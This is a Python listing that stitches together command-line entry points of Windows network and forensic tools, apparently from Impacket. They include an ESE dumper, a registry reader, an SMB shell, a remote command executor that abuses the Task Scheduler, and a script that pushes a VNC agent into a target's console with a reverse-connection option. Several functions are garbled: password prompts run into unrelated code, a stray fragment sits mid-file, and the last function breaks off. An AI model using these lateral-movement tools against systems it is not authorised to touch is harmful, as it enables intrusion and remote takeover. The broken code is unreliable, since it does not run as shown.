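def main():
    """Command-line entry point for the ESE (Extensible Storage Engine) dump tool.

    Expects a database path plus one sub-command: ``info`` (print the
    catalog), ``dump -page N`` (dump a single page) or ``export -table T``
    (dump a table).  The database handle is released on every path,
    including when the selected action fails.
    """
    print(version.BANNER)
    # Init the example's logger theme
    logger.init()

    parser = argparse.ArgumentParser(add_help = True, description = "Extensive Storage Engine utility. Allows dumping "
                                                                    "catalog, pages and tables.")
    parser.add_argument('databaseFile', action='store', help='ESE to open')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    # Both this option and the 'dump' sub-parser's '-page' write options.page;
    # when 'dump' is used the sub-parser's (required) value is the one read.
    parser.add_argument('-page', action='store', help='page to open')

    subparsers = parser.add_subparsers(help='actions', dest='action')

    # dump page
    dump_parser = subparsers.add_parser('dump', help='dumps an specific page')
    dump_parser.add_argument('-page', action='store', required=True, help='page to dump')

    # info page
    subparsers.add_parser('info', help='dumps the catalog info for the DB')

    # export page
    export_parser = subparsers.add_parser('export', help='dumps the catalog info for the DB')
    export_parser.add_argument('-table', action='store', required=True, help='table to dump')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # Python 3 argparse accepts a missing sub-command and leaves options.action
    # as None; refuse cleanly instead of crashing on .upper() below.
    if options.action is None:
        parser.print_help()
        sys.exit(1)

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    ese = ESENT_DB(options.databaseFile)

    try:
        action = options.action.upper()
        if action == 'INFO':
            ese.printCatalog()
        elif action == 'DUMP':
            # int() raises ValueError on a non-numeric page; reported below.
            dumpPage(ese, int(options.page))
        elif action == 'EXPORT':
            exportTable(ese, options.table)
        else:
            raise Exception('Unknown action %s ' % options.action)
    except Exception as e:
        # Full traceback only at DEBUG level; otherwise just the message.
        logging.debug("Exception:", exc_info=True)
        print(e)
    finally:
        # Release the file handle on every path, not only after success.
        ese.close()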
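def main():
    """Command-line entry point for the offline registry hive reader.

    Opens ``hive`` with ``winregistry.Registry`` and dispatches one of the
    ``enum_key`` / ``enum_values`` / ``get_value`` / ``get_class`` / ``walk``
    sub-commands to the matching module-level helper.  The hive is closed
    on every path, including when the helper raises.
    """
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)

    parser = argparse.ArgumentParser(add_help = True, description = "Reads data from registry hives.")

    parser.add_argument('hive', action='store', help='registry hive to open')
    subparsers = parser.add_subparsers(help='actions', dest='action')
    # A enum_key command
    enumkey_parser = subparsers.add_parser('enum_key', help='enumerates the subkeys of the specified open registry key')
    enumkey_parser.add_argument('-name', action='store', required=True, help='registry key')
    enumkey_parser.add_argument('-recursive', dest='recursive', action='store_true', required=False, help='recursive search (default False)')

    # A enum_values command
    enumvalues_parser = subparsers.add_parser('enum_values', help='enumerates the values for the specified open registry key')
    enumvalues_parser.add_argument('-name', action='store', required=True, help='registry key')

    # A get_value command
    getvalue_parser = subparsers.add_parser('get_value', help='retrieves the data for the specified registry value')
    getvalue_parser.add_argument('-name', action='store', required=True, help='registry value')

    # A get_class command
    getclass_parser = subparsers.add_parser('get_class', help='retrieves the data for the specified registry class')
    getclass_parser.add_argument('-name', action='store', required=True, help='registry class name')

    # A walk command
    walk_parser = subparsers.add_parser('walk', help='walks the registry from the name node down')
    walk_parser.add_argument('-name', action='store', required=True, help='registry class name to start walking down from')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # Newer argparse versions accept a missing sub-command (action is None);
    # refuse cleanly instead of failing on .upper() below.
    if options.action is None:
        parser.print_help()
        sys.exit(1)

    reg = winregistry.Registry(options.hive)
    try:
        action = options.action.upper()
        if action == 'ENUM_KEY':
            print("[%s]" % options.name)
            enumKey(reg, options.name, options.recursive)
        elif action == 'ENUM_VALUES':
            enumValues(reg, options.name)
        elif action == 'GET_VALUE':
            getValue(reg, options.name)
        elif action == 'GET_CLASS':
            getClass(reg, options.name)
        elif action == 'WALK':
            walk(reg, options.name)
    finally:
        # Close the hive even when the helper raised; previously close() was
        # only reached on the success path.
        reg.close()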
def main():
    """Entry point for the read-only NTFS explorer.

    Opens ``volume`` in ``MiniShell``; with ``-extract`` a single ``get``
    command is run non-interactively, otherwise the interactive command
    loop is started.
    """
    print(version.BANNER)
    # Init the example's logger theme
    logger.init()
    parser = argparse.ArgumentParser(add_help = True, description = "NTFS explorer (read-only)")
    parser.add_argument('volume', action='store', help='NTFS volume to open (e.g. \\\\.\\C: or /dev/disk1s1)')
    parser.add_argument('-extract', action='store', help='extracts pathname (e.g. \windows\system32\config\sam)')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()

    root_logger = logging.getLogger()
    root_logger.setLevel(logging.DEBUG if options.debug is True else logging.INFO)

    shell = MiniShell(options.volume)
    if options.extract is None:
        shell.cmdloop()
    else:
        # One-shot mode: hand the path to the shell's 'get' command and exit.
        shell.onecmd("get %s"% options.extract)
def main():
    """Entry point: push a VNC agent into the target's active console session.

    The agent script (``Invoke-Vnc.ps1``) is delivered either by SMB upload
    (``-method upload``) or by letting the target fetch it from an HTTP
    server started by this script (``-method download``), and is then run
    through ``VNCEXEC.run`` with the supplied bind/reverse VNC settings.

    NOTE(review): this listing is garbled around the password prompt (the
    marked line below); the temp-dir / PORT setup that must precede the
    ``with open(...)`` is not visible here, so treat that region as a
    placeholder rather than runnable code.
    """
    tempdir = None
    logger.init()

    parser = argparse.ArgumentParser(add_help = True, description = "Inject VNC agent into active console session. Payload is delivered via SMB or HTTP.")

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-share', action='store', default = None, help='share where vnc batch file will be upload '
                                                                           '(default - check for available writable shares )')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    vnc_group = parser.add_argument_group('vnc')
    vnc_group.add_argument('-invoke-vnc-path', dest='invoke_vnc_path', default='Invoke-Vnc.ps1', action='store', help="Invoke-Vnc.ps1 filepath")
    vnc_group.add_argument('-bc-ip', dest='bc_ip', required=False, action='store', help="IP with reverse VNC handler")
    vnc_group.add_argument('-contype', dest='contype', required=True, action='store', help="Connection type. Either bind or reverse")
    vnc_group.add_argument('-vncport', dest='vncport', required=True, action='store', help="Port for reverse/bind VNC connection")
    vnc_group.add_argument('-vncpass', dest='vncpass', required=True, action='store', help="VNC password")
    vnc_group.add_argument('-method', dest='method', required=False, default='upload', action='store', help="Payload delivery method. Either 'upload' or 'download'")
    vnc_group.add_argument('-httpport', dest='httpport', required=False, default='80', action='store', help="HTTP server port to download payload from")

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
                       'ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')
    group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
                       'ommited it use the domain part (FQDN) specified in the target parameter')
    group.add_argument('-A', action="store", metavar = "authfile", help="smbclient/mount.cifs-style authentication file. ")


    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()

    
    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re

    # Split '[[domain/]username[:password]@]target'.  A password given here
    # ends up in the process list and shell history of the operator's host;
    # prefer the interactive prompt, -hashes, -aesKey or -A.
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
        options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    try:
        if options.A is not None:
            (domain, username, password) = load_smbclient_auth_file(options.A)
            # NOTE(review): this writes the cleartext password to the log at
            # DEBUG level; drop the password field or mask it.
            logging.debug('loaded smbclient auth file: domain=%s, username=%s, password=%s' % (repr(domain), repr(username), repr(password)))
        
        if domain is None:
            domain = ''

        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
            from getpass import getpass
            # NOTE(review): garbled in this listing -- the code between the
            # getpass() call and the 'with open(<tempdir>/Invoke-Vnc.ps1)'
            # (presumably the 'download' branch creating tempdir and PORT)
            # is missing.
            password = getpass("Password:"******"/Invoke-Vnc.ps1", 'wb') as f:
                f.write(open(options.invoke_vnc_path, 'rb').read())
                f.close()
            os.chdir(tempdir)
            Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

            # Binds every local interface: anyone who can reach PORT can fetch
            # the payload for as long as the script runs.
            httpd = SocketServer.TCPServer(("", PORT), Handler)


            logging.info("Serving payload at HTTP port " + str(PORT))
            # Daemon thread so the server does not keep the process alive on exit.
            httpthread = threading.Thread(target=httpd.serve_forever)
            httpthread.daemon = True
            httpthread.start()
        elif options.method == 'upload':
            pass
        else:
            logging.critical("Unknown delivery method specified")
            sys.exit(1)


        executer = VNCEXEC(username, password, domain, options.hashes, options.aesKey,
                           options.share, options.k, options.dc_ip)
        executer.run(address, options.method, options.bc_ip, options.contype, options.vncpass, options.vncport, options.invoke_vnc_path, options.httpport)


    except (Exception, KeyboardInterrupt), e:
        #import traceback
        #print traceback.print_exc()
        logging.error(str(e))
        # NOTE(review): tempdir is still None unless the 'download' branch ran,
        # so 'None + "/"' raises TypeError here and masks the real error; the
        # 'tempdir is not None' guard two lines down comes too late.
        os.unlink(tempdir + '/' + 'Invoke-Vnc.ps1')
        os.rmdir(tempdir)
        if options.method=='download' and tempdir is not None:
            delete_temp_file(tempdir, tempdir + '/' + 'Invoke-Vnc.ps1')
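def main():
    """Entry point for the SMB mini-shell client.

    Builds credentials and target from the command line, connects with
    ``SMBConnection``/``login`` and then either replays the commands in
    ``--command-file`` or starts the interactive ``MiniImpacketShell``.
    """
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)
    parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-f','--command-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
    parser.add_argument('-v', '--verbose', action='count', default=0, help='Verbosity (can be stacked)')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                                                       '(KRB5CCNAME) based on target parameters. If valid credentials '
                                                       'cannot be found, it will use the ones specified in the command '
                                                       'line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')

    group = parser.add_argument_group('connection')

    group.add_argument('-dc-ip', action='store', metavar="ip address",
                       help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
                            'the target parameter')
    group.add_argument('-target-ip', action='store', metavar="ip address",
                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                            'This is useful when target is the NetBIOS name and you cannot resolve it')
    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
                       help='Destination port to connect to SMB Server')

    args = parser.parse_args()

    if args.verbose == 0:
        logging.basicConfig(level=logging.INFO)
    else:
        logging.basicConfig(level=logging.DEBUG)

    creds = SMBCredential.from_args(args)
    target = SMBTarget.from_args(args)
    # Only the target is echoed.  The parsed args (target string may carry a
    # password) and the credential object (password / hashes / AES key) were
    # previously printed to stdout; that leaks secrets into terminal logs.
    logging.debug("Target host %r, address %s", target.get_hostname(), target.get_addr()[0])

    try:
        smb_client = SMBConnection(target, sess_port=target.port)
        smb_client.login(creds)

        shell = MiniImpacketShell(smb_client)

        if args.command_file is not None:
            logging.info("Executing commands from %s" % args.command_file.name)
            # argparse opened the file; close it once the script is consumed.
            with args.command_file as script:
                for line in script:
                    if line.startswith('#'):
                        # Comment line: echo only, never execute.
                        print(line, end=' ')
                    else:
                        # Echo the command *before* running it so its output
                        # is attributable (the old form ran onecmd() inside
                        # print() and printed "None" after it).
                        print("# %s" % line, end=' ')
                        shell.onecmd(line)
        else:
            shell.cmdloop()
    except Exception:
        logging.exception('Exception in main')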
def main():
    """Entry point for the SMB mini-shell client.

    Parses ``[[domain/]username[:password]@]target`` plus the authentication
    and connection options, prompts for a password when none of
    password / -hashes / -aesKey / -no-pass was supplied, then connects and
    either replays the commands in ``-file`` or starts the interactive shell.

    NOTE(review): this listing is garbled at the password prompt (marked
    below); the connection, login and shell construction between the prompt
    and the ``-file`` loop are not visible.
    """
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)
    parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                                                       '(KRB5CCNAME) based on target parameters. If valid credentials '
                                                       'cannot be found, it will use the ones specified in the command '
                                                       'line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')

    group = parser.add_argument_group('connection')

    group.add_argument('-dc-ip', action='store', metavar="ip address",
                       help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
                            'the target parameter')
    group.add_argument('-target-ip', action='store', metavar="ip address",
                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                            'This is useful when target is the NetBIOS name and you cannot resolve it')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re
    # Split '[[domain/]username[:password]@]target'.  A password given on the
    # command line is visible to other local users via the process list and
    # shell history; prefer the prompt, -hashes or Kerberos (-k).
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
        options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if options.target_ip is None:
        # Connect to whatever was named in the target string unless overridden.
        options.target_ip = address

    if domain is None:
        domain = ''
    
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        # NOTE(review): garbled in this listing -- everything between the
        # getpass() call and the "Executing commands from" log line is missing.
        password = getpass("Password:"******"Executing commands from %s" % options.file.name)
            for line in options.file.readlines():
                if line[0] != '#':
                    # Echo the command, then run it in the mini shell.
                    print("# %s" % line, end=' ')
                    shell.onecmd(line)
                else:
                    # Comment line: echo only.
                    print(line, end=' ')
        else:
            shell.cmdloop()
    except Exception as e:
        # Full traceback only at DEBUG level; otherwise just the message.
        logging.debug("Exception:", exc_info=True)
        logging.error(str(e))
def main():
    """Entry point for the SMB mini-shell client (variant with ``-port``).

    Parses ``[[domain/]username[:password]@]target`` plus the authentication
    and connection options, prompts for a password when none of
    password / -hashes / -aesKey / -no-pass was supplied, then connects and
    either replays the commands in ``-file`` or starts the interactive shell.

    NOTE(review): this listing is garbled at the password prompt (marked
    below); the connection, login and shell construction between the prompt
    and the ``-file`` loop are not visible.
    """
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)
    parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                                                       '(KRB5CCNAME) based on target parameters. If valid credentials '
                                                       'cannot be found, it will use the ones specified in the command '
                                                       'line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')

    group = parser.add_argument_group('connection')

    group.add_argument('-dc-ip', action='store', metavar="ip address",
                       help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
                            'the target parameter')
    group.add_argument('-target-ip', action='store', metavar="ip address",
                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                            'This is useful when target is the NetBIOS name and you cannot resolve it')
    # choices restricts the port to the two SMB transports (NetBIOS / direct).
    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
                       help='Destination port to connect to SMB Server')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re
    # Split '[[domain/]username[:password]@]target'.  A password given on the
    # command line is visible to other local users via the process list and
    # shell history; prefer the prompt, -hashes or Kerberos (-k).
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
        options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if options.target_ip is None:
        # Connect to whatever was named in the target string unless overridden.
        options.target_ip = address

    if domain is None:
        domain = ''

    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        # NOTE(review): garbled in this listing -- everything between the
        # getpass() call and the "Executing commands from" log line is missing.
        password = getpass("Password:"******"Executing commands from %s" % options.file.name)
            for line in options.file.readlines():
                if line[0] != '#':
                    # Echo the command, then run it in the mini shell.
                    print("# %s" % line, end=' ')
                    shell.onecmd(line)
                else:
                    # Comment line: echo only.
                    print(line, end=' ')
        else:
            shell.cmdloop()
    except Exception as e:
        # Full traceback only when -debug was requested.
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        logging.error(str(e))
def main():
    """Entry point: execute a command on the target through the Task Scheduler (TSCH) RPC endpoint.

    Parses target, RPC port, command and authentication options, resolves
    the output codec (module-level ``CODEC``), optionally loads Kerberos
    keys from a keytab, prompts for a password when nothing else was
    supplied, and hands everything to ``TSCH_EXEC.play``.
    """
    global CODEC
    print(version.BANNER)

    parser = argparse.ArgumentParser()

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('port', action='store', type=int, help='TSCH RPC endpoint port number (usually 49154)')
    parser.add_argument('command', action='store', nargs='*', default=' ', help='command to execute at the target ')

    parser.add_argument('-session-id', action='store', type=int, help='an existed logon session to use (no output, no cmd.exe)')
    parser.add_argument('-ts', action='store_true', help='adds timestamp to every logging output')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default "%s"). If errors are detected, run chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec ' % CODEC)
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
    group.add_argument('-dc-ip', action='store',metavar="ip address",  help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
    group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # Init the example's logger theme
    logger.init(options.ts)

    # An explicit -codec wins; otherwise only fill in utf-8 when the module
    # has no default of its own.
    if options.codec is not None:
        CODEC = options.codec
    elif CODEC is None:
        CODEC = 'utf-8'

    logging.warning("This will work ONLY on Windows >= Vista")

    # With nargs='*' and no positional, options.command is the default ' ',
    # which joins to ' ' -- i.e. no command was given.
    if ''.join(options.command) == ' ':
        logging.error('You need to specify a command to execute!')
        sys.exit(1)

    root_logger = logging.getLogger()
    if options.debug is True:
        root_logger.setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        root_logger.setLevel(logging.INFO)

    import re

    # Split '[[domain/]username[:password]@]target'.
    target_re = re.compile('(?:(?:([^\/@:]*)\/)?([^@:]*)(?::([^@]*))?@)?(.*)')
    domain, username, password, address = target_re.match(options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        # Everything up to the last '@' belonged to the password.
        pass_tail, _, real_address = address.rpartition('@')
        password = password + '@' + pass_tail
        address = real_address

    if not (0 < options.port < 65536):
        logging.error("Invalid port number: %i" % (options.port))
        return

    if domain is None:
        domain = ''

    if options.keytab is not None:
        # Keys from the keytab imply Kerberos authentication.
        Keytab.loadKeysFromKeytab (options.keytab, username, domain, options)
        options.k = True

    needs_prompt = (password == '' and username != '' and options.hashes is None
                    and options.no_pass is False and options.aesKey is None)
    if needs_prompt:
        from getpass import getpass

        password = getpass("Password:")

    if options.aesKey is not None:
        # An AES key is only usable with Kerberos.
        options.k = True

    atsvc_exec = TSCH_EXEC(username, password, domain, options.hashes, options.aesKey, options.k, options.dc_ip, ' '.join(options.command), options.session_id)
    atsvc_exec.play(address, options.port)
                       action="store",
                       metavar="hex key",
                       help='AES key to use for Kerberos Authentication '
                       '(128 or 256 bits)')
    group.add_argument('-keytab',
                       action="store",
                       help='Read keys for SPN from keytab file')

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # Init the example's logger theme
    logger.init(options.ts)

    if options.codec is not None:
        CODEC = options.codec
    else:
        if CODEC is None:
            CODEC = 'utf-8'

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        logging.getLogger().setLevel(logging.INFO)

    import re
def main():
    """Entry point for the SMB mini-shell client (``parse_target`` variant).

    Parses ``[[domain/]username[:password]@]target`` via ``parse_target``
    plus the authentication and connection options, prompts for a password
    when none of password / -hashes / -aesKey / -no-pass was supplied, then
    connects and either replays the commands in ``-file`` or starts the
    interactive shell.

    NOTE(review): this listing is garbled at the password prompt (marked
    below); the connection, login and shell construction between the prompt
    and the ``-file`` loop are not visible.
    """
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)
    parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                                                       '(KRB5CCNAME) based on target parameters. If valid credentials '
                                                       'cannot be found, it will use the ones specified in the command '
                                                       'line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                            '(128 or 256 bits)')

    group = parser.add_argument_group('connection')

    group.add_argument('-dc-ip', action='store', metavar="ip address",
                       help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
                            'the target parameter')
    group.add_argument('-target-ip', action='store', metavar="ip address",
                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                            'This is useful when target is the NetBIOS name and you cannot resolve it')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        logging.getLogger().setLevel(logging.INFO)

    # A password given on the command line is visible to other local users via
    # the process list and shell history; prefer the prompt, -hashes or -k.
    domain, username, password, address = parse_target(options.target)

    if options.target_ip is None:
        # Connect to whatever was named in the target string unless overridden.
        options.target_ip = address

    if domain is None:
        domain = ''
    
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        # NOTE(review): garbled in this listing -- everything between the
        # getpass() call and the "Executing commands from" log line is missing.
        password = getpass("Password:"******"Executing commands from %s" % options.file.name)
            for line in options.file.readlines():
                if line[0] != '#':
                    # Echo the command, then run it in the mini shell.
                    print("# %s" % line, end=' ')
                    shell.onecmd(line)
                else:
                    # Comment line: echo only.
                    print(line, end=' ')
        else:
            shell.cmdloop()
    except Exception as e:
        # Full traceback only at DEBUG level; otherwise just the message.
        logging.debug("Exception:", exc_info=True)
        logging.error(str(e))
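def main():
    """Command-line entry point for the ESE (Extensible Storage Engine) dump tool.

    Expects a database path plus one sub-command: ``info`` (print the
    catalog), ``dump -page N`` (dump a single page) or ``export -table T``
    (dump a table).  The database handle is released on every path.

    Written to run under both Python 2 and 3 (``print(x)`` with a single
    argument, ``except ... as e``).
    """
    print(version.BANNER)
    # Init the example's logger theme
    logger.init()

    parser = argparse.ArgumentParser(
        add_help=True,
        description="Extensive Storage Engine utility. Allows dumping "
        "catalog, pages and tables.")
    parser.add_argument('databaseFile', action='store', help='ESE to open')
    parser.add_argument('-debug',
                        action='store_true',
                        help='Turn DEBUG output ON')
    # Both this option and the 'dump' sub-parser's '-page' write options.page;
    # when 'dump' is used the sub-parser's (required) value is the one read.
    parser.add_argument('-page', action='store', help='page to open')

    subparsers = parser.add_subparsers(help='actions', dest='action')

    # dump page
    dump_parser = subparsers.add_parser('dump', help='dumps an specific page')
    dump_parser.add_argument('-page',
                             action='store',
                             required=True,
                             help='page to dump')

    # info page
    subparsers.add_parser('info', help='dumps the catalog info for the DB')

    # export page
    export_parser = subparsers.add_parser(
        'export', help='dumps the catalog info for the DB')
    export_parser.add_argument('-table',
                               action='store',
                               required=True,
                               help='table to dump')

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # Newer argparse versions accept a missing sub-command (action is None);
    # refuse cleanly instead of failing on .upper() below.
    if options.action is None:
        parser.print_help()
        sys.exit(1)

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    ese = ESENT_DB(options.databaseFile)

    try:
        action = options.action.upper()
        if action == 'INFO':
            ese.printCatalog()
        elif action == 'DUMP':
            # int() raises ValueError on a non-numeric page; reported below.
            dumpPage(ese, int(options.page))
        elif action == 'EXPORT':
            exportTable(ese, options.table)
        else:
            # The original used a bare `raise` with no active exception,
            # which itself fails with a TypeError; raise a real one.
            raise Exception('Unknown action %s ' % options.action)
    except Exception as e:
        # Full traceback only at DEBUG level; otherwise just the message.
        logging.debug("Exception:", exc_info=True)
        print(e)
    finally:
        # Release the file handle on every path; the original never closed it.
        ese.close()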
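def main(args):
    """Enumerate the RPC interfaces a remote endpoint exposes (ifmap).

    ``args`` is ``[host, port]``.  The endpoint's management interface is
    asked for its advertised interface ids (``hinq_if_ids``); that set is
    merged with the static ``uuid_database`` and every candidate is probed
    with a bind to see whether it is actually reachable.  Prints one entry
    per interface that is listed or listening, with protocol/provider names
    when known.

    Returns 1 on bad usage (wrong argument count, non-numeric or
    out-of-range port), ``None`` otherwise.  Any DCERPC error other than
    ``abstract_syntax_not_supported`` is propagated.
    """
    # Init the example's logger theme
    logger.init()
    if len(args) != 2:
        print("usage: ./ifmap.py <host> <port>")
        return 1

    host = args[0]
    # Validate the port up front instead of failing deep inside the transport.
    try:
        port = int(args[1])
    except ValueError:
        print("usage: ./ifmap.py <host> <port>")
        return 1
    if not (0 < port < 65536):
        print("Invalid port number: %i" % port)
        return 1

    stringbinding = "ncacn_ip_tcp:%s" % host
    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.set_dport(port)

    dce = trans.get_dce_rpc()
    dce.connect()

    dce.bind(mgmt.MSRPC_UUID_MGMT)

    ifids = mgmt.hinq_if_ids(dce)

    uuidtups = set(
        uuid.bin_to_uuidtup(ifids['if_id_vector']['if_id'][index]
                            ['Data'].getData())
        for index in range(ifids['if_id_vector']['count']))

    dce.disconnect()

    probes = uuidtups | uuid_database

    for tup in sorted(probes):
        # One fresh association per probe: a rejected bind leaves the
        # previous one unusable for the next interface.
        dce.connect()

        binuuid = uuid.uuidtup_to_bin(tup)
        try:
            dce.bind(binuuid)
        except rpcrt.DCERPCException as e:
            if str(e).find('abstract_syntax_not_supported') >= 0:
                listening = False
            else:
                raise
        else:
            listening = True
        finally:
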